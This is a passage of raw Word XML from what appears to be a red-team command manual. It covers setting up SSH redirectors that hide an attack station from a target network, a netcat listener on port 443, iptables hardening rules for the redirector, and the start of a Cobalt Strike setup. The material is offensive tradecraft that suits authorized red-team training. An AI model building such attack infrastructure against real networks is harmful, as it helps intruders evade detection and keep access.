                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Pre-Execution Recon</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:b w:val="1"/>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _2rds7z6c87gd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6480"/>
            </w:tabs>
            <w:spacing w:before="200" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="0" w:firstLine="0"/>
            <w:contextualSpacing w:val="0"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_6lixofcjhmyn">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Remote Execution</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:b w:val="1"/>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _6lixofcjhmyn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6480"/>
            </w:tabs>
            <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="360" w:firstLine="0"/>
            <w:contextualSpacing w:val="0"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_xv51okun5nkw">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Service Manipulation</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _xv51okun5nkw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6480"/>
            </w:tabs>
            <w:spacing w:before="200" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="0" w:firstLine="0"/>
            <w:contextualSpacing w:val="0"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_25adoriag98o">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Other Helpful Commands</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:b w:val="1"/>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _25adoriag98o \h </w:instrText>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:b w:val="1"/>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6480"/>
            </w:tabs>
            <w:spacing w:after="80" w:before="200" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="0" w:firstLine="0"/>
            <w:contextualSpacing w:val="0"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_v0c7pzhkeoil">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Other Helpful Notes</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:b w:val="1"/>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _v0c7pzhkeoil \h </w:instrText>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:b w:val="1"/>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pStyle w:val="Heading2"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_amgnpapqu6c1" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1v6e4ia406mz" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>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2"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_c76t0ihccgkc" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to Use This Book</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">
      <w:pPr>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Any time a phrase of word is surrounded by carrots &lt;&gt;, the user must enter their own relevant input. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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2B">
      <w:pPr>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dir /a &lt;FileName&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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2D">
      <w:pPr>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The user might input:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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2F">
      <w:pPr>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dir /a password.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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31">
      <w:pPr>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When the symbol | is seen in the command, it means ‘or’.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_kz3i8fu7kczl" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3suii1aog4dq" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>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2"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8s2n6bkyi5r3" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Setting Up a Redirector</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">
      <w:pPr>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Redirectors are useful as they add a layer of obscurity between the attacker on the target network. If the IP address of the redirector is discovered, an attacker can use a new redirector to continue operations. In practice an attacker will operate with multiple redirectors in expectation that one will be “burned” at some point during the engagement. If that redirectors IP address is denied access to the target network, other options remain with the leftover redirectors.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_w4yl7hqazwun" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using SSH as a Bent Pipe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">
      <w:pPr>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The following commands will setup a redirector on port 443. After executing the following commands, be patient. It may take some time, but a password prompt will appear after executing the final command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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39">
      <w:pPr>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ssh &lt;user&gt;@&lt;redirectorIP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">
      <w:pPr>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su root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">
      <w:pPr>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ssh -v -L &lt;redirectorIP&gt;:443:&lt;AttackStationIP&gt;:443 &lt;user&gt;@&lt;redirectorIP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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3D">
      <w:pPr>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The “-L” portion of the command is an argument used to redirect data from the specified local port, through the secure tunnel to the specified destination host and port.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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3F">
      <w:pPr>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On the local attack box, setup a netcat “catcher” on 443. Browse to the redirector using another local box to see if the https packet will be routed to the attack box. To setup netcat, use the following command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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41">
      <w:pPr>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nc -lvp 443</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_c0ywgi1xvejq" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IP Tables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">
      <w:pPr>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IP tables need to be established to harden the redirector. The redirector should only handle traffic that is associated with boxes in the target range or that of the attack box.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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45">
      <w:pPr>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su root</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:Switch to root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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47">
      <w:pPr>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iptables -F</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:Flush the rules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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49">
      <w:pPr>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iptables -A INPUT -i eth0 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">:Allow connections from the attack station</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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-s &lt;AttackStationIP&gt; -j ACCEPT</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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4C">
      <w:pPr>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iptables -A INPUT -i eth0</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:Allow connections for the target space; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
      <w:pPr>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-s &lt;TargetSubnetRange&gt; -j ACCEPT</w:t>
        <w:tab/>
        <w:t xml:space="preserve">&lt;TargetSubnetRange&gt; example: 172.16.0.0/16</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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4F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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iptables -A INPUT -i lo -j ACCEPT</w:t>
        <w:tab/>
        <w:t xml:space="preserve">:Allow connections from redirector to</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="720"/>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itself</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>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52">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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iptables -P INPUT DROP</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:Set INPUT chain to drop by default</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>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54">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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iptables -A OUTPUT -o eth0 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">:Allow Redirector to talk back to the</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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-d &lt;AttackStationIP&gt; -m state </w:t>
        <w:tab/>
        <w:t xml:space="preserve">attack station</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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--state NEW, ESTABLISHED, RELATED </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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-j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>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59">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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iptables -A OUTPUT -o eth0</w:t>
        <w:tab/>
        <w:t xml:space="preserve">:Allow Redirector to communicate with </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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-d &lt;TargetSubnetRange&gt; -m state</w:t>
        <w:tab/>
        <w:t xml:space="preserve">related and established connections from </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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--state NEW,ESTABLISHED,RELATED </w:t>
        <w:tab/>
        <w:t xml:space="preserve">target network</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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-j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>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5E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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iptables -A OUTPUT -o lo -j ACCEPT</w:t>
        <w:tab/>
        <w:t xml:space="preserve">:Allow connections from redirector to </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005F">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="720"/>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itself</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>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61">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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iptables -P OUTPUT DROP</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:Set OUTPUT chain to drop by default</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_gnns0kx8jn7l" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7hmitc492gmt" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_stt7xbxyk5wv" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>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2"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_nstinv3f3prh" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cobalt Strike</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000066">
      <w:pPr>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Cobalt Strike is a red teaming software that consists of a teamserver and a client.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_95d3puv7wtg9" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cobalt Strike Setup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000068">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy Cobalt strike folder to the Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000069">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run the teamserver with either command</w:t>
      </w:r>
    </w:p>
